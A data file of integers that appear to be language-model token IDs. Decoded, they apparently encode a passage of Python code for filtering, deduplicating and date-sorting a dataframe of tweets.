220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4731,
13,
79,
16260,
2288,
60,
4008,
628,
220,
220,
220,
825,
4268,
62,
13159,
62,
292,
979,
72,
62,
10641,
19858,
62,
6738,
62,
83,
732,
1039,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
17220,
477,
3435,
326,
389,
407,
3210,
355,
979,
72,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
17816,
5239,
20520,
796,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
5239,
1,
4083,
39014,
7,
50033,
2124,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
4458,
22179,
26933,
72,
611,
3933,
19841,
2760,
7,
72,
8,
1279,
19710,
2073,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
13538,
329,
1312,
287,
2124,
60,
4008,
628,
220,
220,
220,
825,
4808,
1102,
1851,
62,
4475,
62,
1462,
62,
20307,
7,
944,
11,
3128,
62,
5239,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
38240,
257,
3128,
4731,
286,
1296,
334,
1,
22556,
22556,
14,
3020,
14,
1860,
1,
656,
1296,
334,
1,
22556,
22556,
12,
3020,
12,
1860,
1,
198,
220,
220,
220,
220,
220,
220,
220,
329,
779,
351,
262,
21015,
3128,
8265,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
6818,
2099,
7,
4475,
62,
5239,
8,
287,
357,
2536,
11,
28000,
1098,
8,
198,
220,
220,
220,
220,
220,
220,
220,
3128,
62,
5239,
796,
3128,
62,
5239,
13,
33491,
10786,
14,
3256,
705,
12,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
3128,
62,
5239,
628,
220,
220,
220,
825,
10385,
62,
83,
7277,
62,
19581,
62,
1462,
62,
20307,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
38240,
6126,
9667,
422,
1296,
366,
22556,
22556,
14,
3020,
14,
1860,
1,
284,
366,
22556,
22556,
12,
3020,
12,
1860,
1,
287,
198,
220,
220,
220,
220,
220,
220,
220,
12665,
62,
7568,
1366,
14535,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
4475,
8973,
796,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
4475,
1,
4083,
8899,
7,
944,
13557,
1102,
1851,
62,
4475,
62,
1462,
62,
20307,
8,
628,
220,
220,
220,
825,
3297,
62,
83,
732,
1039,
62,
1525,
62,
4475,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
33947,
12665,
416,
511,
3128,
532,
4465,
329,
597,
3297,
286,
640,
2168,
198,
220,
220,
220,
220,
220,
220,
220,
3781,
11,
304,
13,
70,
13,
22712,
15598,
2458,
625,
640,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
30619,
62,
27160,
7203,
4475,
1600,
287,
5372,
28,
17821,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
797,
9630,
1366,
14535,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
9630,
796,
2837,
7,
11925,
7,
944,
13,
83,
732,
1039,
62,
7568,
4008,
628,
220,
220,
220,
825,
4268,
62,
646,
489,
5344,
62,
83,
732,
1039,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
14258,
23418,
12665,
287,
12665,
62,
7568,
357,
16341,
329,
262,
717,
4554,
198,
220,
220,
220,
220,
220,
220,
220,
286,
1123,
6126,
8,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
14781,
62,
646,
489,
16856,
7203,
5239,
1600,
287,
5372,
28,
17821,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
797,
9630,
1366,
14535,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
9630,
796,
2837,
7,
11925,
7,
944,
13,
83,
732,
1039,
62,
7568,
4008,
628,
220,
220,
220,
825,
4268,
62,
1525,
62,
12947,
62,
259,
62,
3672,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
14258,
12665,
326,
3994,
5002,
422,
2989,
62,
38707,
287,
2035,
198,
220,
220,
220,
220,
220,
220,
220,
20579,
393,
3068,
357,
72,
13,
68,
1539,
12665,
810,
262,
2989,
3381,
287,
7763,
287,
198,
220,
220,
220,
220,
220,
220,
220,
17044,
5412,
286,
2130,
3597,
393,
4750,
287,
6126,
737,
15161,
198,
220,
220,
220,
220,
220,
220,
220,
3815,
286,
2846,
1351,
318,
2989,
62,
38707,
11688,
11,
475,
2836,
460,
751,
198,
220,
220,
220,
220,
220,
220,
220,
284,
2116,
13,
12947,
62,
38707,
11688,
284,
4268,
416,
3224,
2846,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
611,
407,
2116,
13,
12947,
62,
38707,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
12947,
62,
38707,
318,
6565,
532,
751,
379,
1551,
530,
3381,
284,
366,
1343,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
12947,
62,
38707,
11688,
1,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
198,
220,
220,
220,
220,
220,
220,
220,
329,
3381,
287,
2116,
13,
12947,
62,
38707,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6818,
2099,
7,
4354,
8,
287,
357,
2536,
11,
28000,
1098,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6818,
3381,
220,
1303,
284,
787,
1654,
4731,
2125,
470,
6565,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
14258,
262,
12665,
326,
3994,
597,
286,
2989,
2846,
287,
2035,
257,
20579,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
393,
257,
3068,
198,
220,
220,
220,
220,
220,
220,
220,
5721,
62,
14933,
796,
1351,
7,
944,
13,
83,
732,
1039,
62,
7568,
13,
28665,
82,
13,
27160,
8,
198,
220,
220,
220,
220,
220,
220,
220,
329,
3381,
287,
2116,
13,
12947,
62,
38707,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
366,
434,
507,
1,
287,
5721,
62,
14933,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15802,
62,
9630,
796,
2116,
13,
83,
732,
1039,
62,
7568,
58,
944,
13,
83,
732,
1039,
62,
7568,
13,
434,
507,
13,
2536,
13,
3642,
1299,
7,
4354,
8,
6624,
6407,
4083,
9630,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
14781,
7,
434,
507,
62,
9630,
11,
287,
5372,
28,
17821,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
366,
29460,
1,
287,
5721,
62,
14933,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
20579,
62,
9630,
796,
2116,
13,
83,
732,
1039,
62,
7568,
58,
944,
13,
83,
732,
1039,
62,
7568,
13,
29460,
13,
2536,
13,
3642,
1299,
7,
4354,
8,
6624,
6407,
4083,
9630,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
14781,
7,
29460,
62,
9630,
11,
287,
5372,
28,
17821,
8,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
797,
9630,
1366,
14535,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
9630,
796,
2837,
7,
11925,
7,
944,
13,
83,
732,
1039,
62,
7568,
4008,
628,
220,
220,
220,
825,
1394,
62,
83,
732,
1039,
62,
4480,
62,
38707,
7,
944,
11,
3381,
62,
4868,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
41692,
477,
262,
12665,
287,
12665,
62,
7568,
326,
466,
5626,
3994,
379,
1551,
530,
198,
220,
220,
220,
220,
220,
220,
220,
3381,
422,
3381,
62,
4868,
13,
770,
318,
4465,
329,
9041,
1366,
422,
3009,
7824,
198,
220,
220,
220,
220,
220,
220,
220,
2989,
4269,
11,
810,
340,
318,
1690,
16638,
284,
2824,
257,
2060,
1263,
4269,
198,
220,
220,
220,
220,
220,
220,
220,
1262,
1811,
2989,
2846,
290,
788,
21136,
262,
4269,
1568,
13,
628,
220,
220,
220,
220,
220,
220,
220,
8975,
772,
12665,
7723,
351,
20129,
22967,
836,
470,
3994,
198,
220,
220,
220,
220,
220,
220,
220,
10348,
2846,
11,
523,
428,
460,
307,
4465,
612,
355,
880,
13,
628,
220,
220,
220,
220,
220,
220,
220,
3381,
62,
4868,
357,
8841,
393,
1351,
286,
13042,
2599,
4947,
286,
2846,
284,
4268,
319,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2099,
7,
4354,
62,
4868,
8,
6624,
965,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6818,
18896,
7,
4354,
62,
4868,
8,
1875,
657,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1394,
62,
9630,
796,
2116,
13,
83,
732,
1039,
62,
7568,
58,
944,
13,
83,
732,
1039,
62,
7568,
13,
5239,
13,
2536,
13,
3642,
1299,
7,
4354,
62,
4868,
8,
6624,
6407,
4083,
9630,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
796,
2116,
13,
83,
732,
1039,
62,
7568,
13,
346,
420,
58,
14894,
62,
9630,
60,
628,
220,
220,
220,
220,
220,
220,
220,
611,
2099,
7,
4354,
62,
4868,
8,
6624,
1351,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1394,
62,
9630,
796,
279,
67,
13,
7295,
13,
9630,
13,
5317,
2414,
15732,
26933,
4357,
288,
4906,
11639,
600,
2414,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
3381,
287,
3381,
62,
4868,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6818,
18896,
7,
4354,
8,
1875,
657,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3381,
62,
14894,
62,
9630,
796,
2116,
13,
83,
732,
1039,
62,
7568,
58,
944,
13,
83,
732,
1039,
62,
7568,
13,
5239,
13,
2536,
13,
3642,
1299,
7,
4354,
8,
6624,
6407,
4083,
9630,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1394,
62,
9630,
796,
1394,
62,
9630,
13,
33295,
7,
4354,
62,
14894,
62,
9630,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1394,
62,
9630,
796,
1394,
62,
9630,
13,
14781,
62,
646,
489,
16856,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
796,
2116,
13,
83,
732,
1039,
62,
7568,
13,
346,
420,
58,
14894,
62,
9630,
60,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
797,
9630,
1366,
14535,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
9630,
796,
2837,
7,
11925,
7,
944,
13,
83,
732,
1039,
62,
7568,
4008,
628,
220,
220,
220,
1303,
29113,
14468,
7804,
4242,
198,
220,
220,
220,
1303,
25458,
284,
778,
1726,
12665,
357,
26949,
973,
706,
5874,
198,
220,
220,
220,
1303,
15210,
8,
198,
220,
220,
220,
1303,
29113,
14468,
7804,
4242,
628,
220,
220,
220,
825,
4268,
62,
1525,
62,
4354,
62,
259,
62,
3672,
7,
944,
11,
2846,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
14258,
12665,
326,
3994,
5002,
422,
2846,
287,
2035,
20579,
393,
198,
220,
220,
220,
220,
220,
220,
220,
3068,
13,
383,
2846,
11507,
1276,
307,
257,
1351,
286,
13042,
13,
628,
220,
220,
220,
220,
220,
220,
220,
770,
2446,
318,
262,
976,
355,
4268,
62,
1525,
62,
12947,
62,
259,
62,
3672,
2446,
11,
2845,
340,
198,
220,
220,
220,
220,
220,
220,
220,
2753,
14977,
5128,
422,
2836,
13,
770,
460,
307,
973,
284,
1037,
651,
5755,
286,
198,
220,
220,
220,
220,
220,
220,
220,
18084,
13,
628,
220,
220,
220,
220,
220,
220,
220,
2846,
357,
4868,
2599,
21015,
1351,
286,
13042,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
611,
407,
2846,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
38707,
318,
6565,
532,
3802,
379,
1551,
530,
2989,
2846,
4731,
1,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
198,
220,
220,
220,
220,
220,
220,
220,
329,
3381,
287,
2846,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6818,
2099,
7,
4354,
8,
287,
357,
2536,
11,
28000,
1098,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6818,
3381,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
14258,
262,
12665,
326,
3994,
597,
286,
2846,
287,
2035,
257,
20579,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
393,
257,
3068,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
836,
470,
761,
284,
900,
366,
6624,
6407,
1600,
326,
318,
30806,
198,
220,
220,
220,
220,
220,
220,
220,
5721,
62,
14933,
796,
1351,
7,
944,
13,
83,
732,
1039,
62,
7568,
13,
28665,
82,
13,
27160,
8,
198,
220,
220,
220,
220,
220,
220,
220,
329,
3381,
287,
2846,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
366,
434,
507,
1,
287,
5721,
62,
14933,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
15802,
62,
9630,
796,
2116,
13,
83,
732,
1039,
62,
7568,
58,
944,
13,
83,
732,
1039,
62,
7568,
13,
434,
507,
13,
2536,
13,
3642,
1299,
7,
4354,
8,
6624,
6407,
4083,
9630,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
14781,
7,
434,
507,
62,
9630,
11,
287,
5372,
28,
17821,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
366,
29460,
1,
287,
5721,
62,
14933,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
20579,
62,
9630,
796,
2116,
13,
83,
732,
1039,
62,
7568,
58,
944,
13,
83,
732,
1039,
62,
7568,
13,
29460,
13,
2536,
13,
3642,
1299,
7,
4354,
8,
6624,
6407,
4083,
9630,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
14781,
7,
29460,
62,
9630,
11,
287,
5372,
28,
17821,
8,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
797,
9630,
1366,
14535,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
9630,
796,
2837,
7,
11925,
7,
944,
13,
83,
732,
1039,
62,
7568,
4008,
628,
220,
220,
220,
825,
4268,
62,
1525,
62,
4354,
62,
259,
62,
83,
7277,
7,
944,
11,
2846,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
14258,
12665,
326,
3994,
5002,
422,
2846,
287,
262,
6126,
2420,
13,
198,
220,
220,
220,
220,
220,
220,
220,
17637,
460,
307,
2035,
257,
4731,
357,
4758,
318,
5716,
355,
530,
3381,
8,
393,
257,
1351,
198,
220,
220,
220,
220,
220,
220,
220,
286,
13042,
357,
4758,
1989,
1123,
5716,
355,
257,
4553,
4268,
1339,
737,
628,
220,
220,
220,
220,
220,
220,
220,
770,
318,
749,
4465,
329,
1972,
5755,
286,
28585,
393,
18084,
1820,
12665,
326,
198,
220,
220,
220,
220,
220,
220,
220,
1656,
284,
307,
1233,
24707,
1366,
13,
628,
220,
220,
220,
220,
220,
220,
220,
770,
318,
635,
4465,
329,
12047,
1005,
732,
1039,
11,
543,
460,
307,
13013,
198,
220,
220,
220,
220,
220,
220,
220,
416,
12047,
12665,
7268,
262,
4731,
366,
17034,
2488,
1,
628,
220,
220,
220,
220,
220,
220,
220,
2846,
357,
8841,
393,
21015,
1351,
286,
13042,
2599,
2846,
326,
1656,
287,
12665,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
356,
765,
284,
4268,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2099,
7,
38707,
8,
287,
357,
2536,
11,
28000,
1098,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2420,
62,
9630,
796,
2116,
13,
83,
732,
1039,
62,
7568,
58,
944,
13,
83,
732,
1039,
62,
7568,
13,
5239,
13,
2536,
13,
3642,
1299,
7,
38707,
8,
6624,
6407,
4083,
9630,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
14781,
7,
5239,
62,
9630,
11,
287,
5372,
28,
17821,
8,
628,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
2099,
7,
38707,
8,
6624,
1351,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
3381,
287,
2846,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6818,
2099,
7,
4354,
8,
287,
357,
2536,
11,
28000,
1098,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6818,
18896,
7,
4354,
8,
1875,
657,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2420,
62,
9630,
796,
2116,
13,
83,
732,
1039,
62,
7568,
58,
944,
13,
83,
732,
1039,
62,
7568,
13,
5239,
13,
2536,
13,
3642,
1299,
7,
4354,
8,
6624,
6407,
4083,
9630,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
14781,
7,
5239,
62,
9630,
11,
287,
5372,
28,
17821,
8,
628,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5298,
35528,
7203,
20560,
1276,
307,
4731,
393,
1351,
286,
4731,
19570,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
797,
9630,
1366,
14535,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
9630,
796,
2837,
7,
11925,
7,
944,
13,
83,
732,
1039,
62,
7568,
4008,
628,
220,
220,
220,
825,
4268,
62,
1525,
62,
29460,
62,
4480,
62,
77,
62,
83,
732,
1039,
7,
944,
11,
3509,
62,
22510,
62,
13966,
333,
34303,
28,
16,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
41692,
477,
12665,
416,
514,
1142,
1047,
326,
1656,
517,
621,
198,
220,
220,
220,
220,
220,
220,
220,
3509,
62,
22510,
62,
13966,
333,
34303,
1661,
287,
12665,
62,
7568,
13,
628,
220,
220,
220,
220,
220,
220,
220,
770,
2163,
460,
307,
640,
18587,
13,
628,
220,
220,
220,
220,
220,
220,
220,
21045,
2105,
477,
2985,
351,
517,
621,
352,
6126,
815,
307,
257,
3338,
835,
284,
198,
220,
220,
220,
220,
220,
220,
220,
8106,
503,
257,
1256,
286,
262,
18084,
13,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
923,
62,
2435,
796,
640,
13,
2435,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
35442,
2105,
12665,
416,
5100,
2985,
9313,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
651,
1351,
286,
514,
1142,
1047,
326,
3051,
1165,
881,
198,
220,
220,
220,
220,
220,
220,
220,
9585,
62,
7220,
62,
9127,
82,
796,
2116,
13,
83,
732,
1039,
62,
7568,
14692,
29460,
1,
4083,
8367,
62,
9127,
82,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
329,
1312,
287,
2837,
7,
11925,
7,
44754,
62,
7220,
62,
9127,
82,
8,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
9585,
62,
7220,
62,
9127,
82,
58,
72,
60,
19841,
3509,
62,
22510,
62,
13966,
333,
34303,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2270,
62,
9630,
796,
1312,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2270,
198,
220,
220,
220,
220,
220,
220,
220,
5100,
62,
385,
1142,
1047,
796,
1351,
7,
44754,
62,
7220,
62,
9127,
82,
58,
15,
25,
9032,
62,
9630,
4083,
9630,
8,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
21077,
1600,
18896,
7,
45956,
515,
62,
385,
1142,
1047,
828,
366,
18417,
351,
517,
621,
1600,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3509,
62,
22510,
62,
13966,
333,
34303,
11,
366,
83,
732,
1039,
287,
12665,
62,
7568,
1,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
4268,
777,
514,
1142,
1047,
422,
12665,
62,
7568,
198,
220,
220,
220,
220,
220,
220,
220,
37894,
62,
22510,
796,
18896,
7,
45956,
515,
62,
385,
1142,
1047,
8,
1003,
1238,
198,
220,
220,
220,
220,
220,
220,
220,
329,
1312,
11,
17044,
62,
29460,
287,
27056,
378,
7,
45956,
515,
62,
385,
1142,
1047,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
18896,
7,
45956,
515,
62,
385,
1142,
1047,
8,
19841,
1802,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
35442,
2105,
12665,
422,
2836,
1600,
1312,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
1312,
4,
25067,
576,
62,
22510,
6624,
657,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
18467,
1348,
1600,
642,
9,
72,
14,
25067,
576,
62,
22510,
11,
366,
25067,
286,
2836,
10532,
1,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4268,
62,
9630,
796,
2116,
13,
83,
732,
1039,
62,
7568,
58,
944,
13,
83,
732,
1039,
62,
7568,
13,
29460,
6624,
17044,
62,
29460,
4083,
9630,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
14781,
7,
14781,
62,
9630,
11,
287,
5372,
28,
17821,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
797,
9630,
1366,
14535,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
83,
732,
1039,
62,
7568,
13,
9630,
796,
2837,
7,
11925,
7,
944,
13,
83,
732,
1039,
62,
7568,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
366,
51,
566,
1600,
2835,
19510,
2435,
13,
2435,
3419,
532,
923,
62,
2435,
20679,
1899,
1539,
18,
828,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
1084,
1769,
284,
1844,
1,
628,
220,
220,
220,
825,
751,
62,
11338,
62,
10879,
7,
944,
11,
2245,
10879,
62,
9186,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
3060,
1573,
393,
1351,
286,
2456,
284,
2245,
2456,
973,
287,
2251,
62,
4775,
62,
21454,
13,
198,
220,
220,
220,
220,
220,
220,
220,
383,
1573,
1244,
307,
257,
19016,
393,
18084,
7621,
13,
317,
2219,
1339,
318,
3354,
286,
2956,
7278,
198,
220,
220,
220,
220,
220,
220,
220,
326,
389,
44267,
656,
2456,
357,
68,
13,
70,
13,
422,
35116,
8,
326,
1656,
7830,
13,
628,
220,
220,
220,
220,
220,
220,
220,
383,
649,
2245,
10879,
481,
1656,
379,
886,
286,
2116,
13,
11338,
62,
10879,
1351,
11,
523,
2836,
198,
220,
220,
220,
220,
220,
220,
220,
460,
3538,
2198,
284,
766,
543,
2245,
10879,
423,
587,
2904,
2087,
416,
262,
198,
220,
220,
220,
220,
220,
220,
220,
2836,
13,
628,
220,
220,
220,
220,
220,
220,
220,
2245,
10879,
25,
357,
8841,
393,
1351,
286,
13042,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2099,
7,
11338,
10879,
62,
9186,
8,
287,
357,
2536,
11,
28000,
1098,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
2099,
7,
11338,
10879,
62,
9186,
8,
6624,
965,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
10385,
4731,
284,
28000,
1098,
611,
407,
28000,
1098,
1541,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2245,
10879,
62,
9186,
796,
2245,
10879,
62,
9186,
13,
12501,
1098,
10786,
40477,
12,
23,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11338,
62,
10879,
796,
2116,
13,
11338,
62,
10879,
1343,
685,
11338,
10879,
62,
9186,
60,
628,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
2099,
7,
11338,
10879,
62,
9186,
8,
6624,
1351,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
3381,
287,
2245,
10879,
62,
9186,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6818,
2099,
7,
4354,
8,
287,
357,
2536,
11,
28000,
1098,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6818,
18896,
7,
4354,
8,
1875,
657,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
28000,
1098,
62,
38707,
62,
4868,
796,
685,
4354,
611,
2099,
7,
4354,
8,
6624,
28000,
1098,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
3381,
13,
12501,
1098,
10786,
40477,
12,
23,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
3381,
287,
2245,
10879,
62,
9186,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11338,
62,
10879,
796,
2116,
13,
11338,
62,
10879,
1343,
28000,
1098,
62,
38707,
62,
4868,
628,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5298,
35528,
7203,
20560,
1276,
307,
4731,
393,
1351,
286,
13042,
19570,
628,
220,
220,
220,
1303,
29113,
14468,
7804,
4242,
198,
220,
220,
220,
1303,
25458,
329,
10240,
1573,
19998,
198,
220,
220,
220,
1303,
29113,
14468,
7804,
4242,
198,
220,
220,
220,
37227,
383,
2251,
62,
4775,
62,
19503,
80,
62,
7568,
2446,
318,
973,
284,
2251,
257,
1366,
14535,
198,
220,
220,
220,
326,
3607,
262,
1573,
40279,
290,
1573,
19998,
286,
262,
1353,
299,
2456,
287,
198,
220,
220,
220,
262,
35789,
13,
770,
318,
2727,
1262,
262,
4683,
299,
2528,
74,
2134,
11,
290,
340,
318,
198,
220,
220,
220,
3421,
6906,
319,
703,
867,
2456,
356,
4601,
284,
10104,
4823,
1146,
13,
628,
